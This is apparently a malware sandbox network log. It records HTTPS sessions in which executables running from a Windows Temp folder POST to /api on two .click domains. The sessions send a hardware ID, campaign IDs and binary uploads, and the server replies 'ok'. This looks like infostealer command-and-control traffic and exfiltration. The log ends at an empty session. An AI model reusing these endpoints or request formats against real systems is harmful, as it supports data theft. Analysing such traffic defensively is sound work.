2024-12-22 01:16:36 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <f
2024-12-22 01:16:36 UTC	1015	IN	Data Raw: 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 Data Ascii: al" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><sp
2024-12-22 01:16:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49831	104.21.67.146	443	5040	C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:37 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 50 Host: cheapptaxysu.click
2024-12-22 01:16:37 UTC	50	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=CZJvss--geopoxid&j=
2024-12-22 01:16:38 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ttd9r5qsrbh3gi7qnm2oucs154; expires=Wed, 16 Apr 2025 19:03:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DY3Ns9912RiQOxsvPLZX3cQ9RIz5Q9SdjEKeWawoW%2FszGe5qGPQTLxnU0mAtgX2C2MJDOa7eit14mw%2Bx7Q3L2YkKdBdMuQP1Eh2cB0fPBlv%2F3TWGV%2FWipVRLr413nF%2FOHnZEHS0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c447f8c72c332-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1521&min_rtt=1519&rtt_var=575&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1041&delivery_rate=1894873&cwnd=180&unsent_bytes=0&cid=4da9ccbc87427421&ts=815&x=0"
2024-12-22 01:16:38 UTC	237	IN	Data Raw: 34 36 63 0d 0a 47 52 76 6e 79 30 66 74 4d 39 45 33 35 69 6e 68 71 37 4a 51 57 36 33 50 75 57 41 59 33 72 2b 33 31 30 71 79 49 59 56 69 55 32 46 69 4f 5a 48 70 66 64 6b 66 38 30 53 44 43 39 76 66 77 43 55 2b 67 65 33 59 42 44 72 6b 32 64 61 37 4f 64 63 4e 70 78 51 2b 51 79 4e 39 68 71 63 30 69 42 2f 7a 55 70 34 4c 32 2f 44 4a 63 6a 37 44 37 59 4e 43 66 62 54 64 31 72 73 6f 30 30 72 71 45 6a 38 43 63 58 65 41 6f 79 4b 4f 56 37 42 62 69 30 79 45 7a 74 4d 36 4e 63 53 69 30 51 30 36 38 70 33 53 72 57 69 49 41 38 67 48 4a 77 42 55 65 70 53 67 5a 5a 41 66 71 68 57 44 52 38 4f 52 6b 44 45 2b 7a 36 50 66 42 48 4f 32 31 39 2b 7a 4b 64 5a 4c 39 51 73 31 43 58 46 35 67 36 49 6f 68 30 4f 39 55 59 78 48 67 73 54 54 Data Ascii: 46cGRvny0ftM9E35inhq7JQW63PuWAY3r+310qyIYViU2FiOZHpfdkf80SDC9vfwCU+ge3YBDrk2da7OdcNpxQ+QyN9hqc0iB/zUp4L2/DJcj7D7YNCfbTd1rso00rqEj8CcXeAoyKOV7Bbi0yEztM6NcSi0Q068p3SrWiIA8gHJwBUepSgZZAfqhWDR8ORkDE+z6PfBHO219+zKdZL9Qs1CXF5g6Ioh0O9UYxHgsTT
2024-12-22 01:16:38 UTC	902	IN	Data Raw: 63 6e 65 50 71 73 4e 43 49 76 79 4f 35 37 59 35 77 56 62 71 45 44 64 44 5a 44 65 63 36 53 4b 44 45 65 73 56 6a 45 65 4e 7a 4e 4d 39 50 73 36 74 79 51 31 36 76 39 58 64 73 53 4c 66 54 4f 67 4f 4f 77 52 7a 63 49 4b 6d 49 6f 64 58 76 46 62 45 42 63 50 4f 79 48 4a 68 6a 34 33 4c 41 58 6d 6f 30 4d 54 31 4e 35 35 61 70 77 63 39 51 79 4d 35 67 36 63 6b 67 6c 47 68 58 59 39 41 68 74 76 62 4f 7a 54 43 72 64 59 49 64 62 2f 64 30 72 38 69 33 30 6e 6a 44 54 77 46 65 33 6e 46 35 32 57 49 53 66 4d 4e 78 47 69 47 32 64 63 2b 4c 34 32 58 6d 78 30 30 70 5a 33 53 75 57 69 49 41 2b 38 46 4d 67 42 77 64 6f 61 68 4c 70 31 52 6f 56 4f 4a 54 70 48 50 31 54 77 7a 7a 4c 2f 52 44 48 79 2f 31 4e 36 38 4c 64 64 48 70 30 35 78 42 47 4d 35 33 65 6b 45 67 6c 71 2f 58 35 4e 4c 77 39 61 Data Ascii: cnePqsNCIvyO57Y5wVbqEDdDZDec6SKDEesVjEeNzNM9Ps6tyQ16v9XdsSLfTOgOOwRzcIKmIodXvFbEBcPOyHJhj43LAXmo0MT1N55apwc9QyM5g6ckglGhXY9AhtvbOzTCrdYIdb/d0r8i30njDTwFe3nF52WISfMNxGiG2dc+L42Xmx00pZ3SuWiIA+8FMgBwdoahLp1RoVOJTpHP1TwzzL/RDHy/1N68LddHp05xBGM53ekEglq/X5NLw9a
2024-12-22 01:16:38 UTC	1369	IN	Data Raw: 34 34 62 30 0d 0a 6f 39 77 55 4f 71 4f 54 7a 50 55 76 33 41 4f 2f 51 44 34 4d 64 48 47 46 71 43 47 43 56 62 4a 59 69 45 4b 41 78 64 77 36 4e 4d 4f 70 31 41 70 79 76 39 58 48 75 79 62 57 52 65 63 46 63 55 30 37 66 70 33 70 66 63 39 31 76 55 4b 51 51 4d 48 38 30 7a 77 33 79 4c 75 62 48 54 53 6c 6e 64 4b 35 61 49 67 44 36 51 30 36 44 33 78 77 68 4b 6f 6c 68 56 2b 38 58 34 78 44 67 38 54 52 4f 54 48 4a 6f 4e 41 4e 64 62 76 56 31 72 6b 74 33 55 43 6e 54 6e 45 45 59 7a 6e 64 36 51 43 42 55 71 4a 45 78 6e 36 41 78 39 34 31 4c 34 2b 79 6c 52 73 36 75 39 47 56 37 57 6a 61 52 4f 41 45 50 41 6c 34 66 59 47 6b 4b 6f 5a 59 75 6b 65 4f 52 34 33 62 33 54 67 38 77 61 48 65 44 58 71 39 33 4e 75 2f 49 35 41 4e 70 77 63 70 51 79 4d 35 71 71 51 31 6e 56 75 34 52 4d 5a 2b 67 Data Ascii: 44b0o9wUOqOTzPUv3AO/QD4MdHGFqCGCVbJYiEKAxdw6NMOp1Apyv9XHuybWRecFcU07fp3pfc91vUKQQMH80zw3yLubHTSlndK5aIgD6Q06D3xwhKolhV+8X4xDg8TROTHJoNANdbvV1rkt3UCnTnEEYznd6QCBUqJExn6Ax941L4+ylRs6u9GV7WjaROAEPAl4fYGkKoZYukeOR43b3Tg8waHeDXq93Nu/I5ANpwcpQyM5qqQ1nVu4RMZ+g
2024-12-22 01:16:38 UTC	1369	IN	Data Raw: 68 6a 34 4c 59 46 48 44 38 77 70 75 73 61 4e 64 50 70 31 68 78 43 58 64 39 68 71 55 73 67 31 79 79 55 59 4e 47 68 38 6e 57 4e 44 7a 4f 70 74 4d 4f 64 62 62 52 30 62 6b 68 31 6b 2f 6b 41 7a 64 44 4e 54 6d 43 73 57 58 58 45 5a 4a 59 6a 30 65 44 79 73 45 31 65 59 48 74 31 51 52 36 2f 49 58 44 70 54 2f 58 58 4b 6b 5a 63 51 52 33 4f 64 33 70 4c 35 31 55 76 56 47 4f 54 6f 66 46 32 6a 49 38 33 61 58 64 42 58 61 30 32 4e 71 7a 4c 64 31 45 37 41 4d 6a 45 58 68 39 69 36 56 6c 77 52 47 30 54 63 51 54 77 2b 7a 48 4d 53 6e 4a 72 70 73 64 4e 4b 57 64 30 72 6c 6f 69 41 50 6e 44 6a 30 49 66 48 4b 4f 72 53 47 50 58 4c 68 62 69 6b 4b 50 77 64 77 31 4b 38 4b 6f 30 77 68 7a 75 64 48 59 74 6a 72 54 51 71 64 4f 63 51 52 6a 4f 64 33 70 41 72 78 6d 6b 42 57 62 42 5a 71 4a 31 7a Data Ascii: hj4LYFHD8wpusaNdPp1hxCXd9hqUsg1yyUYNGh8nWNDzOptMOdbbR0bkh1k/kAzdDNTmCsWXXEZJYj0eDysE1eYHt1QR6/IXDpT/XXKkZcQR3Od3pL51UvVGOTofF2jI83aXdBXa02NqzLd1E7AMjEXh9i6VlwRG0TcQTw+zHMSnJrpsdNKWd0rloiAPnDj0IfHKOrSGPXLhbikKPwdw1K8Ko0whzudHYtjrTQqdOcQRjOd3pArxmkBWbBZqJ1z
2024-12-22 01:16:38 UTC	1369	IN	Data Raw: 39 77 46 31 74 35 33 4b 2b 7a 47 51 52 4f 74 41 61 55 4e 38 63 59 32 6e 4a 6f 6c 61 76 31 6d 46 51 6f 58 4d 32 44 55 32 79 4b 54 63 41 6e 79 75 32 74 69 38 4b 4e 74 4b 37 51 51 77 43 44 73 33 78 61 34 39 7a 77 6e 7a 5a 34 4e 64 6b 38 71 51 4c 58 66 57 37 64 77 4f 4f 75 53 64 32 4b 63 70 31 56 48 6a 44 7a 6f 52 63 48 2b 46 72 44 65 49 58 62 6c 61 68 30 4f 4f 79 74 67 67 4f 63 4b 74 79 52 42 38 74 39 4f 56 2b 32 6a 58 57 36 64 59 63 54 4a 73 63 73 57 32 61 35 59 52 74 46 6e 45 45 38 50 4b 32 6a 38 33 33 61 6e 64 43 58 6d 79 31 64 43 39 4c 4e 70 4f 36 41 73 37 43 6e 4e 35 69 71 77 74 68 46 65 39 56 49 4a 48 6a 6f 6d 65 63 6a 37 58 37 59 4e 43 58 61 62 51 30 36 49 35 35 55 54 6e 55 58 45 63 4e 57 44 46 72 69 6e 50 43 66 4e 59 69 45 47 4f 7a 4e 51 36 50 73 79 Data Ascii: 9wF1t53K+zGQROtAaUN8cY2nJolav1mFQoXM2DU2yKTcAnyu2ti8KNtK7QQwCDs3xa49zwnzZ4Ndk8qQLXfW7dwOOuSd2Kcp1VHjDzoRcH+FrDeIXblah0OOytggOcKtyRB8t9OV+2jXW6dYcTJscsW2a5YRtFnEE8PK2j833andCXmy1dC9LNpO6As7CnN5iqwthFe9VIJHjomecj7X7YNCXabQ06I55UTnUXEcNWDFrinPCfNYiEGOzNQ6Psy
2024-12-22 01:16:38 UTC	1369	IN	Data Raw: 72 76 52 6c 65 31 6f 33 6b 37 68 41 54 41 4c 63 33 6d 44 6f 79 47 4d 57 4c 42 53 6a 55 32 49 79 74 6f 39 50 73 6d 70 32 77 6c 39 73 74 76 51 76 69 47 51 44 61 63 48 4b 55 4d 6a 4f 61 4f 4b 4e 35 31 6a 76 56 61 66 43 35 79 48 79 58 49 2b 77 2b 32 44 51 6e 47 30 30 73 65 77 49 64 68 48 37 67 41 31 43 58 5a 2b 68 61 77 6f 69 6c 57 39 55 59 4e 4c 6a 38 62 58 4f 6a 62 4c 72 64 52 43 4e 50 7a 61 7a 66 56 77 6b 47 50 73 46 68 41 4e 63 47 76 46 74 6d 75 57 45 62 52 5a 78 42 50 44 78 39 6b 7a 4d 63 47 68 30 77 5a 6f 76 4e 62 63 75 69 6e 66 51 2b 51 42 4f 77 74 70 66 34 57 69 4c 59 68 5a 74 31 75 57 53 6f 79 4a 6e 6e 49 2b 31 2b 32 44 51 6b 75 71 32 74 4b 36 61 76 6c 45 2f 41 45 37 41 48 42 31 78 62 5a 72 6c 68 47 30 57 63 51 54 77 38 54 63 50 7a 33 64 6f 64 73 43 Data Ascii: rvRle1o3k7hATALc3mDoyGMWLBSjU2Iyto9Psmp2wl9stvQviGQDacHKUMjOaOKN51jvVafC5yHyXI+w+2DQnG00sewIdhH7gA1CXZ+hawoilW9UYNLj8bXOjbLrdRCNPzazfVwkGPsFhANcGvFtmuWEbRZxBPDx9kzMcGh0wZovNbcuinfQ+QBOwtpf4WiLYhZt1uWSoyJnnI+1+2DQkuq2tK6avlE/AE7AHB1xbZrlhG0WcQTw8TcPz3dodsC
2024-12-22 01:16:38 UTC	1369	IN	Data Raw: 57 2b 4a 74 56 43 36 77 6f 32 44 57 6c 34 6a 36 55 6b 69 46 61 34 52 34 39 5a 69 4d 48 54 50 44 48 47 72 64 55 43 65 37 48 64 6c 66 74 6f 31 31 75 6e 57 48 45 6d 57 47 36 54 6f 32 65 73 52 71 56 66 67 30 65 56 77 74 45 78 4c 38 4b 39 6d 30 77 36 72 64 72 45 39 58 44 47 55 2f 41 48 4c 6b 31 69 4f 59 4b 6c 5a 64 63 52 75 46 71 4b 52 6f 6a 4e 32 54 63 78 7a 4b 6a 65 43 48 61 77 33 4e 32 38 49 74 56 47 34 51 6f 79 44 58 52 34 69 61 30 73 67 56 6a 7a 47 38 52 4d 6d 34 6d 49 63 67 2f 66 71 73 4d 50 61 76 37 76 31 71 51 35 78 55 37 33 42 6e 4d 73 65 48 57 47 72 43 4b 66 45 61 77 62 6e 51 75 45 78 5a 42 71 65 63 2b 70 31 77 46 39 73 74 4c 59 75 69 2f 62 54 4f 30 4f 49 77 78 2b 63 59 6d 68 4b 4a 31 62 75 55 65 4e 51 6f 37 48 32 43 41 36 6a 2b 4f 62 42 57 4c 38 68 Data Ascii: W+JtVC6wo2DWl4j6UkiFa4R49ZiMHTPDHGrdUCe7Hdlfto11unWHEmWG6To2esRqVfg0eVwtExL8K9m0w6rdrE9XDGU/AHLk1iOYKlZdcRuFqKRojN2TcxzKjeCHaw3N28ItVG4QoyDXR4ia0sgVjzG8RMm4mIcg/fqsMPav7v1qQ5xU73BnMseHWGrCKfEawbnQuExZBqec+p1wF9stLYui/bTO0OIwx+cYmhKJ1buUeNQo7H2CA6j+ObBWL8h
2024-12-22 01:16:38 UTC	1369	IN	Data Raw: 53 63 76 45 4e 49 51 42 2b 66 72 75 58 4b 34 68 46 74 46 75 43 53 38 4f 48 6b 44 31 35 6c 35 53 62 53 6a 71 44 6b 35 57 74 61 49 67 44 30 67 4d 2f 44 58 78 76 6c 4f 51 47 6d 45 65 35 54 73 5a 74 68 4e 6a 5a 4a 44 54 64 37 5a 56 43 66 50 79 46 68 66 74 6f 31 46 4b 6e 57 47 46 52 49 43 7a 57 2f 6e 58 64 54 76 31 4d 78 46 33 44 6b 59 4a 38 65 64 33 74 67 30 49 39 76 38 2f 48 73 79 76 47 51 4b 41 2b 44 79 4e 77 62 34 53 6b 4c 6f 4e 76 6a 55 43 48 52 59 33 4f 78 69 4e 35 67 65 33 55 51 69 4b 46 6e 5a 33 31 46 35 34 44 2f 30 42 70 51 30 35 36 69 36 63 69 6d 55 44 2b 64 59 39 64 67 73 54 62 50 6e 76 4f 6f 4d 73 46 4f 76 4b 64 30 2f 56 77 67 41 32 6e 42 43 42 44 49 79 6e 58 38 6e 44 63 42 75 4d 48 6d 77 57 61 69 63 5a 79 59 5a 33 6a 6d 78 41 36 35 4a 32 53 74 6a Data Ascii: ScvENIQB+fruXK4hFtFuCS8OHkD15l5SbSjqDk5WtaIgD0gM/DXxvlOQGmEe5TsZthNjZJDTd7ZVCfPyFhfto1FKnWGFRICzW/nXdTv1MxF3DkYJ8ed3tg0I9v8/HsyvGQKA+DyNwb4SkLoNvjUCHRY3OxiN5ge3UQiKFnZ31F54D/0BpQ056i6cimUD+dY9dgsTbPnvOoMsFOvKd0/VwgA2nBCBDIynX8nDcBuMHmwWaicZyYZ3jmxA65J2Stj
2024-12-22 01:16:38 UTC	1369	IN	Data Raw: 45 54 49 44 63 44 6e 4c 36 53 50 50 43 65 45 62 78 45 2b 53 69 59 68 69 61 35 54 34 69 46 55 71 37 73 4b 62 72 47 6a 47 41 37 39 53 66 30 4e 70 4f 64 33 70 59 6f 78 44 6f 56 4f 48 58 59 43 4f 37 67 77 66 7a 4b 72 64 41 58 53 72 7a 4a 65 61 4b 39 74 50 36 77 63 6e 50 55 56 73 68 71 63 72 69 45 65 69 46 63 6f 4c 6a 49 6d 49 43 33 6e 65 70 39 78 4f 4d 76 44 4d 78 72 73 6a 78 6b 53 6e 50 33 39 44 59 7a 6e 64 36 52 43 4d 58 37 31 53 6b 6c 72 4f 37 39 4d 31 50 38 79 6a 7a 42 4d 36 38 70 33 54 39 58 43 43 44 61 63 45 49 45 4d 6a 4b 64 66 79 63 4e 77 47 34 77 65 62 42 5a 71 4a 78 6e 4a 68 6e 4f 4f 62 45 44 72 6b 6e 5a 4b 37 4a 64 46 41 36 51 4d 6a 45 58 31 36 6b 36 70 69 73 57 2b 57 57 49 6c 4f 6a 63 37 75 44 42 6a 46 76 64 59 4e 66 59 4c 6a 34 71 51 76 77 41 48 Data Ascii: ETIDcDnL6SPPCeEbxE+SiYhia5T4iFUq7sKbrGjGA79Sf0NpOd3pYoxDoVOHXYCO7gwfzKrdAXSrzJeaK9tP6wcnPUVshqcriEeiFcoLjImIC3nep9xOMvDMxrsjxkSnP39DYznd6RCMX71SklrO79M1P8yjzBM68p3T9XCCDacEIEMjKdfycNwG4webBZqJxnJhnOObEDrknZK7JdFA6QMjEX16k6pisW+WWIlOjc7uDBjFvdYNfYLj4qQvwAH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49832	172.67.209.202	443	7820	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:37 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ASQVTPGAAO6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8741 Host: pancakedipyps.click
2024-12-22 01:16:37 UTC	8741	OUT	Data Raw: 2d 2d 41 53 51 56 54 50 47 41 41 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 53 51 56 54 50 47 41 41 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 53 51 56 54 50 47 41 41 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 41 53 51 56 54 50 47 41 41 4f 36 0d 0a 43 6f 6e 74 65 Data Ascii: --ASQVTPGAAO6Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--ASQVTPGAAO6Content-Disposition: form-data; name="pid"2--ASQVTPGAAO6Content-Disposition: form-data; name="lid"FATE99--test--ASQVTPGAAO6Conte
2024-12-22 01:16:38 UTC	1140	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mun0t266nkjq4fi7q1g6di7up0; expires=Wed, 16 Apr 2025 19:03:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BvS9RP3Uio76E6%2Bi15umjk4wtsPDyb%2FjeoaBeFIHbLxfUF987o5aDLOZjTdpK5GgeFt%2ByQzmN0jsAIBNALB%2Be17hMb%2Bmju7Jr%2B5Fnoo3Wkb8G%2BJLrHr%2BE9E35YuZdMx%2FBN9bmq2u"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44811f2242de-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2428&min_rtt=1614&rtt_var=1187&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2848&recv_bytes=9676&delivery_rate=1809169&cwnd=230&unsent_bytes=0&cid=ce2be5a4e39bfbf5&ts=921&x=0"
2024-12-22 01:16:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:16:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49837	172.67.209.202	443	7820	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:40 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SIUJ1DQ2MO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20388 Host: pancakedipyps.click
2024-12-22 01:16:40 UTC	15331	OUT	Data Raw: 2d 2d 53 49 55 4a 31 44 51 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 49 55 4a 31 44 51 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 49 55 4a 31 44 51 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 53 49 55 4a 31 44 51 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --SIUJ1DQ2MOContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--SIUJ1DQ2MOContent-Disposition: form-data; name="pid"3--SIUJ1DQ2MOContent-Disposition: form-data; name="lid"FATE99--test--SIUJ1DQ2MOContent-D
2024-12-22 01:16:40 UTC	5057	OUT	Data Raw: 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 Data Ascii: lrQMn 64F6(X&7~`aO@dR<x
2024-12-22 01:16:41 UTC	1125	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hkne23s4i9uj2hdjfjsjh236qt; expires=Wed, 16 Apr 2025 19:03:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4FjqClDuLEUnSX5IHRGm0kXzCWsXU14NJFwVnynUVeDwCjeWp3j4zri3zuyIpjLMqp2pQqouL2SMn0taQZRvy1YpMDO6ZTJfchMiiPSJz5OO2nRoQYwCupURNgyJA5%2BNnJLXEgql"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44903d1c43e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2093&min_rtt=2087&rtt_var=794&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21345&delivery_rate=1367681&cwnd=226&unsent_bytes=0&cid=fd6212db318a40b4&ts=990&x=0"
2024-12-22 01:16:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:16:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49843	172.67.209.202	443	7820	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Timestamp	Bytes transferred	Direction	Data
